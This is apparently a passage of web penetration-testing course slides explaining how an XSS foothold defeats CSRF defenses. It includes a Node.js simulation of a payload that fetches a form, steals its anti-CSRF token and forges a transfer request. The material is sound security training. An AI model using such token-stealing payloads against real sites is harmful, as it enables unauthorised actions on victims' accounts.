Red PPT Template-46-50

The document discusses how cross-site scripting (XSS) vulnerabilities can be used to bypass cross-site request forgery (CSRF) defenses. Technically, once an XSS flaw is exploited, all CSRF defenses except challenge-response are useless since the attacker is now in the same origin. The document outlines how synchronizer tokens, referer and origin headers can be bypassed by stealing a valid anti-CSRF token using an XSS vulnerability.
5.4.1 Bypassing CSRF Defenses with XSS

Anti-CSRF token mechanisms, and other CSRF prevention techniques, were introduced to mitigate Cross-Site Request Forgery attacks. They were not designed to withstand stacked attacks that combine CSRF with Cross-Site Scripting (XSS).

A single XSS flaw is like a storm that overwhelms the entire CSRF protection system.
WAPTXv2: Section 01, Module 05 - Caendra Inc. © 2020 | p.46
Technically, once we have exploited an XSS flaw, our script runs in the same origin as the vulnerable application, so every request it sends is a genuine same-origin request issued by the victim's browser. All defenses against CSRF, except Challenge-Response mechanisms (a re-authentication prompt, an OTP or a CAPTCHA that requires something the injected script cannot read), are useless.

Synchronizer tokens, checking the Referer header and checking the Origin header can all be bypassed. For the same reason, SameSite cookies and custom-request-header checks offer no protection against this stacked attack either: the browser attaches the session cookie to a same-site request, and the injected script can set any request header the application expects.
https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#synchronizer-token-pattern
https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#verifying-origin-with-standard-headers

5.4.1.1 Bypassing Header Checks

Checking the Referer and Origin headers simply means that the request must come from a proper origin.

Bypassing these types of defense measures is straightforward as long as we have effectively exploited an XSS vulnerability: the browser populates Referer and Origin itself from the page the script is running in, so a request issued by injected script carries the application's own origin and passes the check without any extra effort on our part.

5.4.1.2 Bypassing Anti-CSRF Token

The scenario changes when the security measure is implemented using the Synchronizer Token Pattern. To circumvent this protection, we need to hijack the Anti-CSRF token from a valid form and then use the stolen token in our forged form.

Once the XSS flaw has been detected, there are generally two scenarios that play out. The first, and "luckiest", occurs when the XSS and the CSRF-protected form are contained on the same page, so the token can be read directly from the DOM. The second possibility is that the XSS flaw is located in another part of the web application, in which case the script must first fetch the protected page itself (a same-origin request, so the response body is readable) and pull the token out of it.
Bypassing an Anti-CSRF based mechanism generally requires 2 - 3 steps, depending on where the XSS is located.

1. Request a valid form (with a valid token). Useless if the XSS is in the same page as the form.
2. Extract the valid token from the source code.
3. Forge the form with the stolen token.
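The following is an added example, not code from the WAPTXv2 slides, that models the whole flow of 5.4.1.1 and 5.4.1.2 in plain Node.js so it can be run offline: a toy target that enforces both an Origin check and a synchronizer token, a classic cross-site forgery that both defenses reject, and the three-step XSS payload (request the form, extract the token, forge the request) that passes them because the browser stamps the request with the site's own origin. The origin `https://bank.example`, the attacker origin, the `/transfer` endpoint, the `csrf_token` field name, the token value and the starting balance are all constructed for illustration; the "browser" is a fetch-like function that sets Origin the way a real browser would, and the calls are synchronous where real payload code would use `await fetch(...)`.

```javascript
// Added example: Node.js model of bypassing Origin checks and synchronizer
// tokens from an XSS foothold. Nothing here is from the original slides; the
// origins, paths, field names, token and balance are constructed values.
const SITE_ORIGIN = 'https://bank.example';         // assumed target origin
const ATTACKER_ORIGIN = 'https://attacker.example';  // assumed attacker origin

// Minimal target application applying the two defenses under discussion:
// an Origin header check and a synchronizer (anti-CSRF) token.
function makeServer() {
  const session = { csrfToken: 'tok-9f3a7c', balance: 100 }; // constructed
  return function handle(req) {
    const path = new URL(req.url, SITE_ORIGIN).pathname;
    if (req.method === 'GET' && path === '/transfer') {
      // Form with the synchronizer token embedded as a hidden field
      return {
        status: 200,
        body:
          '<form method="POST" action="/transfer">' +
          `<input type="hidden" name="csrf_token" value="${session.csrfToken}">` +
          '<input name="to"><input name="amount"></form>',
      };
    }
    if (req.method === 'POST' && path === '/transfer') {
      // Defense 1 (5.4.1.1): the request must carry the site's own Origin
      if (req.headers.origin !== SITE_ORIGIN) return { status: 403, body: 'bad origin' };
      // Defense 2 (5.4.1.2): submitted token must match the session token
      const form = new URLSearchParams(req.body);
      if (form.get('csrf_token') !== session.csrfToken) return { status: 403, body: 'bad token' };
      session.balance -= Number(form.get('amount'));
      return { status: 200, body: `ok balance=${session.balance}` };
    }
    return { status: 404, body: 'not found' };
  };
}

// Stand-in for the browser: returns a fetch-like function whose requests carry
// the Origin of the page the script runs in (real browsers set this themselves,
// and the script cannot forge it from a foreign page).
function browserFetch(server, pageOrigin) {
  return (url, opts = {}) =>
    server({
      url,
      method: opts.method || 'GET',
      headers: { origin: pageOrigin, ...(opts.headers || {}) },
      body: opts.body,
    });
}

// Step 2: pull the token out of the form source. A regex is enough for this
// fixed markup; in a browser, document.querySelector is the usual route.
function extractToken(html) {
  const m = html.match(/name="csrf_token"\s+value="([^"]+)"/);
  return m ? m[1] : null;
}

// The XSS payload. currentPageHtml models the "luckiest" case where the
// protected form is on the same page as the XSS; step 1 is then skipped.
function xssPayload(fetchFn, currentPageHtml = '') {
  let token = extractToken(currentPageHtml);
  if (!token) {
    // Step 1: request a valid form. Same-origin, so the browser attaches the
    // victim's cookies and the site's Origin, and the response is readable.
    token = extractToken(fetchFn('/transfer').body);
  }
  // Step 3: forge the request with the stolen token
  return fetchFn('/transfer', {
    method: 'POST',
    body: new URLSearchParams({ to: 'attacker', amount: '10', csrf_token: token }).toString(),
  });
}

// Runs the three cases and returns the outcomes so they can be checked.
function runScenario() {
  const server = makeServer();
  // Classic cross-site CSRF: the attacker's page has no token and the browser
  // stamps the request with the attacker's Origin, so it is rejected.
  const crossSite = browserFetch(server, ATTACKER_ORIGIN)('/transfer', {
    method: 'POST', body: 'to=attacker&amount=10',
  });
  // XSS in another part of the application: request, extract, forge.
  const sameOrigin = browserFetch(server, SITE_ORIGIN);
  const viaFetch = xssPayload(sameOrigin);
  // XSS on the page that already contains the protected form: extract, forge.
  const page = sameOrigin('/transfer');
  const viaDom = xssPayload(sameOrigin, page.body);
  return { crossSite: crossSite.status, viaFetch: viaFetch.status, viaDom: viaDom.status, finalBody: viaDom.body };
}

console.log(runScenario()); // cross-site request 403, both XSS paths 200
```

Only the cross-site attempt is rejected; both XSS paths succeed because the header check sees the legitimate origin and the token check receives the real token. The one thing the model does not show is a challenge-response step such as a password re-prompt, which the script could not satisfy because the secret is never present in the page.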
